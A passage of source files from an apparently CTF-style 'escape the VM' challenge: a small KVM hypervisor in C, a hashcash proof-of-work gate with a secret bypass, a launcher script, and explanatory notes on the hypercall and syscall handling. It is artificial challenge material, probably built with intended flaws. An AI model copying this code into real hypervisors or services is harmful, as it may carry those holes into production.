83 | 84 | vcpu->fd = vcpufd; 85 | vcpu->run = run; 86 | } 87 | 88 | return i; 89 | } 90 | 91 | static int init_memory(struct vm *vm){ 92 | size_t mem_size = vm->mem_size; 93 | void *mem; 94 | 95 | mem = mmap(NULL, mem_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0); 96 | if (mem == MAP_FAILED) { 97 | perror("mmap mem"); 98 | return -1; 99 | } 100 | 101 | vm->mem = mem; 102 | madvise(mem, mem_size, MADV_MERGEABLE); 103 | 104 | struct kvm_userspace_memory_region region = { 105 | .slot = 0, 106 | .flags = 0, 107 | .guest_phys_addr = 0, 108 | .memory_size = mem_size, 109 | .userspace_addr = (uint64_t)mem 110 | }; 111 | 112 | if (ioctl(vm->vmfd, KVM_SET_USER_MEMORY_REGION, ®ion) < 0){ 113 | perror("ioctl KVM_SET_USER_MEMORY_REGION"); 114 | goto error; 115 | } 116 | 117 | return 0; 118 | 119 | error: 120 | munmap(mem, mem_size); 121 | return -1; 122 | } 123 | 124 | int run_vm(struct vm *vm, unsigned vcpuid, uint64_t entry){ 125 | if(vcpuid < 0 || vcpuid >= vm->ncpu) 126 | return -1; 127 | 128 | struct vcpu *vcpu = &vm->vcpu[vcpuid]; 129 | int vcpufd = vcpu->fd; 130 | struct kvm_run *run = vcpu->run; 131 | 132 | struct kvm_guest_debug debug = { 133 | .control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP, 134 | }; 135 | 136 | if (ioctl(vcpufd, 
KVM_SET_GUEST_DEBUG, &debug) < 0){ 137 | perror("KVM_SET_GUEST_DEBUG"); 138 | return -1; 139 | } 140 | 141 | if(set_long_mode(vm, vcpufd) < 0) 142 | return -1; 143 | 144 | struct kvm_regs regs = { 145 | .rip = entry, 146 | .rflags = 0x02, 147 | }; 148 | 149 | if(ioctl(vcpufd, KVM_SET_REGS, ®s) < 0){ 150 | perror("ioctl KVM_SET_REGS"); 151 | return -1; 152 | } 153 | 154 | for(;;){ 155 | struct kvm_regs regs; 156 | struct kvm_sregs sregs; 157 | uint64_t gaddr; 158 | 159 | if(ioctl(vcpufd, KVM_RUN, 0) < 0) { 160 | perror("ioctl KVM_RUN"); 161 | return -1; 162 | } 163 | 164 | #ifdef DEBUG 165 | dump_regs(vcpufd); 166 | #endif 167 | switch(run->exit_reason){ 168 | case KVM_EXIT_HLT: 169 | #ifdef DEBUG 170 | printf("HLT\n"); 171 | getchar(); 172 | break; 173 | #else 174 | return 0; 175 | #endif 176 | case KVM_EXIT_IO: 177 | #ifdef DEBUG 178 | printf("IO\n"); 179 | #endif 180 | kvm_handle_io(vm, vcpu); 181 | break; 182 | case KVM_EXIT_DEBUG: 183 | if(ioctl(vcpufd, KVM_GET_REGS, ®s) < 0){ 184 | perror("ioctl KVM_GET_REGS"); 185 | return -1; 186 | } 187 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 188 | perror("ioctl KVM_GET_SREGS"); 189 | return -1; 190 | } 191 | 192 | if((gaddr = translate(vm, sregs.cr3, regs.rip, 0, 0)) == -1) 193 | return 1; 194 | 195 | if(!memcmp(guest2host(vm, gaddr), "\x0f\x01\xc1", 3) \ 196 | || !memcmp(guest2host(vm, gaddr), "\x0f\x01\xd9", 3)){ 197 | if(sregs.cs.dpl != 0) 198 | return 2; 199 | 200 | #ifdef DEBUG 201 | printf("HYPERCALL\n"); 202 | #endif 203 | kvm_handle_hypercall(vm, vcpu); 204 | *(char*)guest2host(vm, gaddr+2) = 0xd9; 205 | } 206 | else if(!memcmp(guest2host(vm, gaddr), "\x0f\x05", 2)){ 207 | if(sregs.cs.dpl != 3) 208 | return 2; 209 | 210 | #ifdef DEBUG 211 | printf("SYSCALL\n"); 212 | #endif 213 | kvm_handle_syscall(vm, vcpu); 214 | } 215 | break; 216 | default: 217 | printf("exit_reason : %d\n", run->exit_reason); 218 | #ifdef DEBUG 219 | getchar(); 220 | #endif 221 | return -1; 222 | } 223 | } 224 | 225 | return 0; 226 | } 227 | 228 | static int set_long_mode(struct vm *vm, int vcpufd){ 229 | struct kvm_sregs sregs; 230 | struct kvm_segment seg = { 231 | .base = 0, 232 | .limit = 0xffffffff, 233 | .selector = 1 << 3, 234 | .present = 1, 235 | .type = 11, // Code: execute, read, accessed 236 | .dpl = 0, 237 | .db = 0, 238 | .s = 1, // Code/data 239 | .l = 1, 240 | .g = 1, // 4KB granularity 241 | }; 242 | 243 | if(ioctl(vcpufd, KVM_GET_SREGS, &sregs) < 0){ 244 | perror("ioctl KVM_GET_SREGS"); 245 | return -1; 246 | } 247 | 248 | sregs.cs = seg; 249 | seg.type = 3; // Data: read/write, accessed 250 | seg.selector = 2 << 3; 251 | sregs.ds = sregs.ss = seg; 252 | 253 | uint64_t pml4_addr = palloc(0, 0x1000); 254 | uint64_t pdpt_addr = palloc(0, 0x1000*(((vm->mem_size-1)>>39) + 1)); 255 | uint64_t pd_addr = palloc(0, 0x1000*(((vm->mem_size-1)>>30) + 1)); 256 | 257 | assert_addr(vm, pml4_addr); 258 | assert_addr(vm, pdpt_addr); 259 | assert_addr(vm, pd_addr); 260 | 261 | uint64_t *pml4 = guest2host(vm, pml4_addr); 262 | uint64_t *pdpt = guest2host(vm, pdpt_addr); 263 | uint64_t *pd = guest2host(vm, pd_addr); 264 | 265 | for(int i = 0; i < ((vm->mem_size-1)>>39 & 0x1ff) + 1; i++){ 266 | for(int j = 0; j < ((vm->mem_size-1)>>30 & 0x1ff) + 1; j++){ 267 | for(int k = 0; k < ((vm->mem_size-1)>>21 & 0x1ff) + 1; k++){ 268 | pd[k+0x200*(j+0x200*i)] = PDE64_PRESENT | PDE64_RW | PDE64_PS | 0x200000*(k+0x200*(j+0x200*i)); 269 | } 270 | pdpt[j+0x200*i] = PDE64_PRESENT | PDE64_RW | (pd_addr+0x1000*(j+0x200*i)); 271 | } 272 | pml4[i] = PDE64_PRESENT | PDE64_RW | 
(pdpt_addr+0x1000*i); 273 | } 274 | 275 | sregs.cr3 = pml4_addr; 276 | sregs.cr4 = CR4_PAE; 277 | sregs.cr0 = CR0_PE | CR0_MP | CR0_ET | CR0_NE | CR0_WP | CR0_AM | CR0_PG; 278 | sregs.efer = EFER_LME | EFER_LMA; 279 | 280 | if(ioctl(vcpufd, KVM_SET_SREGS, &sregs) < 0){ 281 | perror("ioctl KVM_SET_SREGS"); 282 | return -1; 283 | } 284 | 285 | return 0; 286 | } 287 | -------------------------------------------------------------------------------- /kvm/vm/vm.h: -------------------------------------------------------------------------------- 1 | #ifndef _VM_H 2 | #define _VM_H 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | #define check_addr(vm, addr) (addr < vm->mem_size) 9 | #define assert_addr(vm, addr) assert(addr < vm->mem_size) 10 | #define guest2host(vm, addr) (vm->mem + addr) 11 | 12 | struct vcpu { 13 | int fd; 14 | struct kvm_run *run; 15 | }; 16 | 17 | struct vm { 18 | int vmfd; 19 | 20 | size_t mem_size; 21 | void *mem; 22 | 23 | unsigned ncpu; 24 | struct vcpu vcpu[]; 25 | }; 26 | 27 | struct vm *init_vm(unsigned ncpu, size_t mem_size); 28 | int load_image(struct vm *vm, int fd); 29 | int run_vm(struct vm *vm, unsigned vcpuid, uint64_t entry); 30 | 31 | #endif 32 | -------------------------------------------------------------------------------- /release/hashcash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.3 2 | """Implement Hashcash version 1 protocol in Python 3 | +-------------------------------------------------------+ 4 | | Written by David Mertz; released to the Public Domain | 5 | +-------------------------------------------------------+ 6 | 7 | Double spend database not implemented in this module, but stub 8 | for callbacks is provided in the 'check()' function 9 | 10 | The function 'check()' will validate hashcash v1 and v0 tokens, as well as 11 | 'generalized hashcash' tokens generically. Future protocol version are 12 | treated as generalized tokens (should a future version be published w/o 13 | this module being correspondingly updated). 14 | 15 | A 'generalized hashcash' is implemented in the '_mint()' function, with the 16 | public function 'mint()' providing a wrapper for actual hashcash protocol. 17 | The generalized form simply finds a suffix that creates zero bits in the 18 | hash of the string concatenating 'challenge' and 'suffix' without specifying 19 | any particular fields or delimiters in 'challenge'. E.g., you might get: 20 | 21 | >>> from hashcash import mint, _mint 22 | >>> mint('foo', bits=16) 23 | '1:16:040922:foo::+ArSrtKd:164b3' 24 | >>> _mint('foo', bits=16) 25 | '9591' 26 | >>> from sha import sha 27 | >>> sha('foo9591').hexdigest() 28 | '0000de4c9b27cec9b20e2094785c1c58eaf23948' 29 | >>> sha('1:16:040922:foo::+ArSrtKd:164b3').hexdigest() 30 | '0000a9fe0c6db2efcbcab15157735e77c0877f34' 31 | 32 | Notice that '_mint()' behaves deterministically, finding the same suffix 33 | every time it is passed the same arguments. 'mint()' incorporates a random 34 | salt in stamps (as per the hashcash v.1 protocol). 
35 | """ 36 | import sys 37 | from string import ascii_letters 38 | from math import ceil, floor 39 | from sha import sha 40 | from random import choice 41 | from time import strftime, localtime, time 42 | 43 | ERR = sys.stderr # Destination for error messages 44 | DAYS = 60 * 60 * 24 # Seconds in a day 45 | tries = [0] # Count hashes performed for benchmark 46 | 47 | def mint(resource, bits=20, now=None, ext='', saltchars=8, stamp_seconds=False): 48 | """Mint a new hashcash stamp for 'resource' with 'bits' of collision 49 | 50 | 20 bits of collision is the default. 51 | 52 | 'ext' lets you add your own extensions to a minted stamp. Specify an 53 | extension as a string of form 'name1=2,3;name2;name3=var1=2,2,val' 54 | FWIW, urllib.urlencode(dct).replace('&',';') comes close to the 55 | hashcash extension format. 56 | 57 | 'saltchars' specifies the length of the salt used; this version defaults 58 | 8 chars, rather than the C version's 16 chars. This still provides about 59 | 17 million salts per resource, per timestamp, before birthday paradox 60 | collisions occur. Really paranoid users can use a larger salt though. 61 | 62 | 'stamp_seconds' lets you add the option time elements to the datestamp. 63 | If you want more than just day, you get all the way down to seconds, 64 | even though the spec also allows hours/minutes without seconds. 65 | """ 66 | ver = "1" 67 | now = now or time() 68 | if stamp_seconds: ts = strftime("%y%m%d%H%M%S", localtime(now)) 69 | else: ts = strftime("%y%m%d", localtime(now)) 70 | challenge = "%s:"*6 % (ver, bits, ts, resource, ext, _salt(saltchars)) 71 | return challenge + _mint(challenge, bits) 72 | 73 | def _salt(l): 74 | "Return a random string of length 'l'" 75 | alphabet = ascii_letters + "+/=" 76 | return ''.join([choice(alphabet) for _ in [None]*l]) 77 | 78 | def _mint(challenge, bits): 79 | """Answer a 'generalized hashcash' challenge' 80 | 81 | Hashcash requires stamps of form 'ver:bits:date:res:ext:rand:counter' 82 | This internal function accepts a generalized prefix 'challenge', 83 | and returns only a suffix that produces the requested SHA leading zeros. 84 | 85 | NOTE: Number of requested bits is rounded up to the nearest multiple of 4 86 | """ 87 | counter = 0 88 | hex_digits = int(ceil(bits/4.)) 89 | zeros = '0'*hex_digits 90 | while 1: 91 | digest = sha(challenge+hex(counter)[2:]).hexdigest() 92 | if digest[:hex_digits] == zeros: 93 | tries[0] = counter 94 | return hex(counter)[2:] 95 | counter += 1 96 | 97 | def check(stamp, resource=None, bits=None, 98 | check_expiration=None, ds_callback=None): 99 | """Check whether a stamp is valid 100 | 101 | Optionally, the stamp may be checked for a specific resource, and/or 102 | it may require a minimum bit value, and/or it may be checked for 103 | expiration, and/or it may be checked for double spending. 104 | 105 | If 'check_expiration' is specified, it should contain the number of 106 | seconds old a date field may be. Indicating days might be easier in 107 | many cases, e.g. 
108 | 109 | >>> from hashcash import DAYS 110 | >>> check(stamp, check_expiration=28*DAYS) 111 | 112 | NOTE: Every valid (version 1) stamp must meet its claimed bit value 113 | NOTE: Check floor of 4-bit multiples (overly permissive in acceptance) 114 | """ 115 | if stamp.startswith('0:'): # Version 0 116 | try: 117 | date, res, suffix = stamp[2:].split(':') 118 | except ValueError: 119 | ERR.write("Malformed version 0 hashcash stamp!\n") 120 | return False 121 | if resource is not None and resource != res: 122 | return False 123 | elif check_expiration is not None: 124 | good_until = strftime("%y%m%d%H%M%S", localtime(time()-check_expiration)) 125 | if date < good_until: 126 | return False 127 | elif callable(ds_callback) and ds_callback(stamp): 128 | return False 129 | elif type(bits) is not int: 130 | return True 131 | else: 132 | hex_digits = int(floor(bits/4)) 133 | return sha(stamp).hexdigest().startswith('0'*hex_digits) 134 | elif stamp.startswith('1:'): # Version 1 135 | try: 136 | claim, date, res, ext, rand, counter = stamp[2:].split(':') 137 | except ValueError: 138 | ERR.write("Malformed version 1 hashcash stamp!\n") 139 | return False 140 | if resource is not None and resource != res: 141 | return False 142 | elif type(bits) is int and bits > int(claim): 143 | return False 144 | elif check_expiration is not None: 145 | good_until = strftime("%y%m%d%H%M%S", localtime(time()-check_expiration)) 146 | if date < good_until: 147 | return False 148 | elif callable(ds_callback) and ds_callback(stamp): 149 | return False 150 | else: 151 | hex_digits = int(floor(int(claim)/4)) 152 | return sha(stamp).hexdigest().startswith('0'*hex_digits) 153 | else: # Unknown ver or generalized hashcash 154 | ERR.write("Unknown hashcash version: Minimal authentication!\n") 155 | if type(bits) is not int: 156 | return True 157 | elif resource is not None and stamp.find(resource) < 0: 158 | return False 159 | else: 160 | hex_digits = int(floor(bits/4)) 161 | return sha(stamp).hexdigest().startswith('0'*hex_digits) 162 | 163 | def is_doublespent(stamp): 164 | """Placeholder for double spending callback function 165 | 166 | The check() function may accept a 'ds_callback' argument, e.g. 167 | check(stamp, "mertz@gnosis.cx", bits=20, ds_callback=is_doublespent) 168 | 169 | This placeholder simply reports stamps as not being double spent. 
170 | """ 171 | return False 172 | 173 | if __name__=='__main__': 174 | # Import Psyco if available 175 | try: 176 | import psyco 177 | psyco.bind(_mint) 178 | except ImportError: 179 | pass 180 | import optparse 181 | out, err = sys.stdout.write, sys.stderr.write 182 | parser = optparse.OptionParser(version="%prog 0.1", 183 | usage="%prog -c|-m [-b bits] [string|STDIN]") 184 | parser.add_option('-b', '--bits', type='int', dest='bits', default=20, 185 | help="Specify required collision bits" ) 186 | parser.add_option('-m', '--mint', help="Mint a new stamp", 187 | action='store_true', dest='mint') 188 | parser.add_option('-c', '--check', help="Check a stamp for validity", 189 | action='store_true', dest='check') 190 | parser.add_option('-s', '--timer', help="Time the operation performed", 191 | action='store_true', dest='timer') 192 | parser.add_option('-n', '--raw', help="Suppress trailing newline", 193 | action='store_true', dest='raw') 194 | (options, args) = parser.parse_args() 195 | start = time() 196 | if options.mint: action = mint 197 | elif options.check: action = check 198 | else: 199 | out("Try: %s --help\n" % sys.argv[0]) 200 | sys.exit() 201 | if args: out(str(action(args[0], bits=options.bits))) 202 | else: out(str(action(sys.stdin.read(), bits=options.bits))) 203 | if not options.raw: sys.stdout.write('\n') 204 | if options.timer: 205 | timer = time()-start 206 | err("Completed in %0.4f seconds (%d hashes per second)\n" % 207 | (timer, tries[0]/timer)) 208 | 209 | -------------------------------------------------------------------------------- /release/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shift-crops/EscapeMe/a71768985939c7402b7303bac07e7e7ef6adb71e/release/libc-2.27.so -------------------------------------------------------------------------------- /release/pow.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | # 3 | # Copyright 2018 Google LLC 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | 18 | 19 | from hashcash import check 20 | import random 21 | import string 22 | import sys 23 | import os 24 | import resource 25 | 26 | SKIP_SECRET = sys.argv[1] if len(sys.argv) > 1 else None 27 | 28 | bits = 25 29 | rand_resource = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) 30 | print 'hashcash -mb{} {}'.format(bits, rand_resource) 31 | sys.stdout.flush() 32 | 33 | stamp = sys.stdin.readline().strip() 34 | 35 | if SKIP_SECRET is None or stamp != SKIP_SECRET: 36 | if not stamp.startswith('1:'): 37 | print 'only hashcash v1 supported' 38 | exit(1) 39 | 40 | if not check(stamp, resource=rand_resource, bits=bits): 41 | print 'invalid' 42 | exit(1) 43 | 44 | print 'Any other modules? 
(space split) > ', 45 | sys.stdout.flush() 46 | 47 | mods = sys.stdin.readline().strip() 48 | if '/' in mods: 49 | print 'You can load modules only in this directory' 50 | exit(1) 51 | 52 | args = ['./kvm.elf', 'kernel.bin', 'memo-static.elf'] 53 | args += mods.split() 54 | print '\nexecuting : {}\n'.format(' '.join(args)) 55 | 56 | dirname = os.path.dirname(__file__) 57 | os.chdir(dirname) 58 | 59 | os.close(2) 60 | os.open('/dev/null', os.O_WRONLY) 61 | 62 | resource.setrlimit(resource.RLIMIT_NOFILE, (9, 9)) 63 | os.execv(args[0], args) 64 | -------------------------------------------------------------------------------- /release/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | cd `dirname $0` 4 | set -f 5 | 6 | stdbuf -i0 -o0 -e0 echo -n "Any other modules? > " 7 | read mod 8 | 9 | if [[ $mod == */* ]]; then 10 | echo "You can load modules only in this directory" 11 | else 12 | # only "-static" elf run 13 | exec ./kvm.elf kernel.bin memo-static.elf $mod 14 | fi 15 | --------------------------------------------------------------------------------
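
The guest-physical allocator in kvm/utils/palloc.c hands out page-granular regions of the VM's RAM: init_gmem_manage() seeds a single top chunk covering the whole guest memory, palloc() rounds every request up to the 4 KiB GMALLOC_ALIGNMENT and returns a guest-physical address (or (uint64_t)-1 on failure), a non-zero first argument asks for a fixed page-aligned placement, and get_gmem_info() reports the initialized flag, the total managed memory and the bytes in use. Below is a minimal host-side sketch of that API; the function name example_palloc_usage and the 8 MiB size are illustrative only (in this repo init_vm() is what calls init_gmem_manage()), and the quoted include path mirrors the one used by kvm/vm/kvm_handler.c.

#include <stdio.h>
#include <stdint.h>
#include "utils/palloc.h"

int example_palloc_usage(void)
{
    init_gmem_manage(0x800000);             /* manage 8 MiB of guest RAM */

    uint64_t a = palloc(0, 0x1800);         /* "anywhere": request rounded up to 0x2000 */
    uint64_t b = palloc(0x100000, 0x1000);  /* fixed placement at guest-physical 1 MiB  */
    if (a == (uint64_t)-1 || b == (uint64_t)-1)
        return -1;

    printf("in use: %#lx of %#lx\n",
           (unsigned long)get_gmem_info(2),  /* bytes currently allocated */
           (unsigned long)get_gmem_info(1)); /* total managed memory      */

    pfree(a);                               /* free by guest-physical address */
    pfree(b);
    return 0;
}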
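
translate() in kvm/utils/translate.c walks the guest page tables rooted at CR3 and returns a guest-physical address, or -1 when an entry is missing or lacks the requested write/user permission, and the guest2host() macro from vm/vm.h turns that into a host pointer. Because a guest-virtual buffer may cross page boundaries, the hypercall handler splits every range per page (the foreach_gpage macro in kvm_handler.c). The sketch below shows the same idea with an explicit loop; copy_from_guest is a hypothetical helper, not a function from the repo.

#include <string.h>
#include <stdint.h>
#include "vm/vm.h"
#include "utils/translate.h"

/* Copy len bytes starting at guest-virtual gvaddr into dst, one page at a time. */
int copy_from_guest(struct vm *vm, uint64_t cr3, uint64_t gvaddr, void *dst, size_t len)
{
    size_t done = 0;

    while (done < len) {
        uint64_t off   = (gvaddr + done) & 0xfff;   /* offset inside the current page */
        size_t   chunk = 0x1000 - off;              /* bytes left in this page        */
        if (chunk > len - done)
            chunk = len - done;

        uint64_t gpaddr = translate(vm, cr3, gvaddr + done, 0, 0);
        if (gpaddr == (uint64_t)-1)
            return -1;                              /* unmapped or not permitted */

        memcpy((char *)dst + done, guest2host(vm, gpaddr), chunk);
        done += chunk;
    }
    return 0;
}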
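
kvm_handle_hypercall() takes the hypercall number from RAX and up to four arguments from RBX, RCX, RDX and RSI, writes the result back to RAX, and advances RIP past the 3-byte vmcall encoding; run_vm() only accepts the trap when the guest is at CPL0. The numbers handled are 0x10 (read), 0x11 (write), 0x20 (get_gmem_info), 0x21 (palloc), 0x22 (pfree) and 0x30 (load_module). The repo's real guest-side stubs live in kernel/service/hypercall.s and exploit/utils/hypercall.s (not shown on this page); the C wrapper below is only an illustrative sketch of that calling convention.

/* Guest kernel side: issue a hypercall with the register convention
 * expected by kvm_handle_hypercall(). Illustrative only. */
static inline unsigned long hypercall(unsigned long nr, unsigned long a0,
                                      unsigned long a1, unsigned long a2,
                                      unsigned long a3)
{
    unsigned long ret;

    asm volatile("vmcall"          /* 0f 01 c1, caught by the single-step loop in run_vm() */
                 : "=a"(ret)
                 : "a"(nr), "b"(a0), "c"(a1), "d"(a2), "S"(a3)
                 : "memory");
    return ret;
}

/* e.g. hypercall(0x11, buf, len, 0, 0) asks the host to write() len bytes of guest
 * memory at virtual address buf to stdout, and hypercall(0x21, 0, 0x1000, 0, 0)
 * requests one zeroed page of guest-physical memory. */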
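
kvm_handle_syscall() emulates the syscall entry path itself: it fetches MSR_STAR, MSR_LSTAR and MSR_SFMASK via KVM_GET_MSRS, saves the return RIP in RCX and RFLAGS in R11, jumps to the LSTAR handler, ANDs RFLAGS with the SFMASK value, and builds CS/SS from STAR[47:32]. The guest kernel therefore has to program those MSRs before user code runs; that setup lives in kernel/ and is not shown on this page. The snippet below is a hypothetical sketch of such setup: wrmsr and setup_syscall are illustrative names, and the SFMASK value is an arbitrary placeholder.

#include <stdint.h>

#define MSR_STAR   0xc0000081
#define MSR_LSTAR  0xc0000082
#define MSR_SFMASK 0xc0000084

static inline void wrmsr(uint32_t msr, uint64_t val)
{
    asm volatile("wrmsr" :: "c"(msr), "a"((uint32_t)val), "d"((uint32_t)(val >> 32)));
}

void setup_syscall(uint64_t entry, uint16_t kernel_cs)
{
    wrmsr(MSR_STAR,   (uint64_t)kernel_cs << 32); /* STAR[47:32]: kernel CS selector        */
    wrmsr(MSR_LSTAR,  entry);                     /* 64-bit syscall entry point             */
    wrmsr(MSR_SFMASK, 0x200);                     /* mask ANDed into RFLAGS by this VMM     */
}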